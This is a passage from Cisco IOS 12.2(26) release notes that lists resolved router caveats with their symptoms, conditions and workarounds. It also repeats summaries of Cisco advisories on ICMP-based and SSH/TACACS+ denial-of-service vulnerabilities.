%FIB-3-FIBDISABLE: Fatal error, slot 12: Window did not open, LC to RP IPC is non-operational
Conditions: This symptom is observed on a Cisco 7500 series VIP2-50 and VIP4- 80 in which ATM OC-3 port adapters such as the PA-A1-OC3 or PA-A3-OC3 are installed when the Cisco 7500 series is upgraded to Cisco IOS Release 12.0(24) S or Release 12.0(24)S1. This symptom is also observed on a Cisco 12000 series LC during significant, prolonged routing table churn.
Workaround: Reload CEF on the VIP or LC by entering the clear cef linecard slot-number EXEC command.
Alternate Workaround: Restart the VIP by performing an online insertion and removal (OIR). Restart the LC by executing the hw-module slot slot # reload command.
•
Symptoms: On a Cisco 7500 series, all PVCs may suddenly enter the down state and remain in this state for about two minutes before they come back up. During the DLCI down state, the subinterface does not go down and no notifications are observed in the message log.
Conditions: This symptom is observed on a Cisco 7500 series that is configured with an RPS4+ or an RSP8 and that runs the rsp-jsv-mz image of Cisco IOS Release 12.2(12i). In addition, the router is configured with an 8-port serial port adapter and an HSSI port adapter, is configured for Frame Relay, and has more than 450 PVCs/DLCIs. Note that the symptom may be platform-independent and may also occur on other Cisco platforms in a similar configuration.
Note. This is a timing issue and is not dependant on the number of VC's.
Workaround: There is no workaround.
•
Symptoms: A Cisco voice gateway may reload with a bus error at an invalid address:
System was restarted by bus error at PC 0x60C5BD30, address 0xD391832C
Conditions: This symptom is observed on a Cisco voice gateway that is running Cisco IOS Release 12.2(23b) and H.323.
Workaround: There is no workaround.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en
TCP/IP Host-Mode Services
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en
Resolved Caveats—Cisco IOS Release 12.2(26)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(26). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(26). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Certain release trains of Cisco Internetwork Operating System (IOS), when configured to use the Cisco IOS Secure Shell (SSH) server in combination with Terminal Access Controller Access Control System Plus (TACACS+) as a means to perform remote management tasks on Cisco IOS devices, may contain two vulnerabilities that can potentially cause Cisco IOS devices to exhaust resources and reload. Repeated exploitation of these vulnerabilities can result in a Denial of Service (DoS) condition. Use of SSH with Remote Authentication Dial In UserService (RADIUS) is not affected by these vulnerabilities.
Cisco has made free software available to address these vulnerabilities for all affected customers. There are workarounds available to mitigate the effects of the vulnerability (see the "Workarounds" section of the full advisory for details.)
This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20050406-ssh.shtml
•
Symptoms: An IPv6 PIM neighbor may be down after changing the PIM configuration.
Conditions: This symptom is observed when the no ipv6 pim command is entered on some subinterfaces of a physical Ethernet interface and PIM is enabled on several subinterfaces of the same physical Ethernet interface.
It affects both IPv4 and IPv6, for multicast and OSPF Hello message.
Workaround: There is no workaround.
•
Symptoms: A Cisco MC3810 reloads when you configure ILMI on an ATM interface.
Conditions: This symptom is observed on a Cisco MC3810 that runs Cisco IOS Release 12.3(9).
Workaround: There is no workaround.
IBM Connectivity
•
Symptom: A 4-port serial enhanced port adapter (PA-4T+) may not function when the Synchronous Data Link Control (SDLC) protocol is configured.
Conditions: This symptom is observed on a Cisco 7200.
Workaround: Reload the router to re-initialize the role used in the previous connection.
•
Symptoms: A Cisco router may crash due to a bus error if a PA-A1-OC3MM ATM port adapter is installed but not configured for ATM LANE.
Conditions: This symptom is observed on a Cisco router that runs Cisco IOS interim Release 12.3(8.4a), which is an interim release for Release 12.3(9).
Workaround: There is no workaround.
•
Symptoms: A Cisco router that functions as a LANE server may fail to attain the active state and remains in the backup state regardless of the priority. This situation prevents LANE clients from becoming operational.
Conditions: This symptom is observed on a Cisco 7200 series and Cisco 7500 series that run Cisco IOS interim Release 12.3(8.4) and later interim releases. The symptom may also occur in other releases.
Workaround: There is no workaround.
Interfaces and Bridging
•
Symptoms: The ifOutUcastPkts, ifOutOctets, and ifHCOutOctets Simple Network Management Protocol (SNMP) counters of a Fast Ethernet subinterface may not be incremented.
Conditions: This symptom is observed on a Cisco 7500 series when traffic is received from a serial interface in a Multiprotocol Label Switching (MPLS) network and when the Fast Ethernet subinterface is configured for dot1q encapsulation.
Workaround: There is no workaround.
•
Symptoms: A Cisco 7500 series that is configured as a bridge may not pass bridged traffic on a FDDI interface. This situation may lead to a loss of connectivity.
Conditions: This symptom is observed on Cisco 7500 series that runs a Cisco IOS rsp-jsv-mz image.
Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the FDDI interface.
•
Symptoms: TX Simple Network Management Protocol (SNMP) counters do not update on Fast Ethernet subinterfaces for distributed Cisco Express Forwarding (dCEF) traffic.
Conditions: This symptom is observed on Cisco IOS Release 12.0(26)S and Release 12.3. The hardware is DEC21140A, and the interface receiving the traffic is not located on the same Versatile Interface Processor (VIP).
Workaround: There is no workaround.
•
Symptoms: Spurious memory accesses may occur on a VIP with a PA-FE.
Conditions: This symptom is observed on a Cisco 7500 series when a raw Ethernet packet is received on the PA-FE interface that is configured as an ISL trunk.
Workaround: There is no workaround.
•
Symptoms: The driver code of a third-party vendor Fast Ethernet controller that is part of a C7200-I/O-FE I/O controller may pause indefinitely or reload unexpectedly.
Conditions: This symptom is observed on a Cisco 7200 series when a packet enters the third-party vendor Fast Ethernet controller, when this packet is forwarded to a Multilink PPP (MLP) interface, and when another packet is forwarded by the third-party vendor Fast Ethernet controller before the first packet has left the MLP interface.
Workaround: There is no workaround.
•
Symptoms: Channelized interfaces on a channelized T3 line card or port adapter that is configured for Frame Relay encapsulation may be in the up/down state, and DLCIs are inactive.
Conditions: This symptom is observed when you reload a Cisco platform and when the interfaces were in the up/up state before you reloaded the platform.
Workaround: Enter the
Guest
